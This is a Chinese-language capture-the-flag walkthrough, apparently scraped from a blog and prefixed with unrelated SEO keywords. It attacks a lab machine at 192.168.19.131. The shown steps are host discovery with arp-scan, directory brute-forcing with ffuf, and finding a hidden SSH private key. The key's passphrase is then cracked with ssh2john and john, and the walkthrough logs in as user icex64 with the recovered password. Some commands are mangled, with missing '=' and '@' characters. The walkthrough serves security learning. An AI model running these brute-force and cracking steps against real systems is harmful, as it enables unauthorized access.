网站建设平台还有没有趋势,广西建工集团官网,网站收录查询接口,wordpress 论坛 小程序使用命令查看靶机ip,访问ip
arp-scan -l 使用御剑扫描一下子域名#xff0c;但是没有获取到什么有用的信息 这是一个Apache文档#xff0c;没有什么用 紧接着我们尝试暴力破解#xff0c;这里推荐使用ffuf工具暴力破解目录#xff0c;kali自带的ffuf扫描速度贼快
参数解释…使用命令查看靶机ip,访问ip
arp-scan -l 使用御剑扫描一下子域名但是没有获取到什么有用的信息 这是一个Apache文档没有什么用 紧接着我们尝试暴力破解这里推荐使用ffuf工具暴力破解目录kali自带的ffuf扫描速度贼快
参数解释
-c 有颜色输出
-w 指定字典
-u 指定暴力破解的目录FUZZ 就是暴力破解的目录 看见是一个~secret文件我们访问一下 猜测用户名是不是 icex64用ssh私钥登陆所以这里暴露了一个用户名 icex64 并且内容中提到该目录下有一个ssh私匙文件这里可能需要暴力破解了
破解私钥破解密码
继续使用ffuf暴力破解
ffuf -u http://192.168.19.131/~secret/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200 找到一个文件夹尝试访问一下 看起来像base加密尝试用全家桶解密一下 然后利用john对 ssh_txt进行爆破。还原密码 该字典文件是kali上自带的字典.
命令/usr/share/john/ssh2john.py ssh_txt hash john --wordlist/usr/share/wordlists/fasttrack.txt hash 发现密码
得到用户icex64 的密码是P55w0rd!
ssh icex64192.168.19.131 -i ssh_txt
赋予私钥600权限
chmod 600 ssh_txt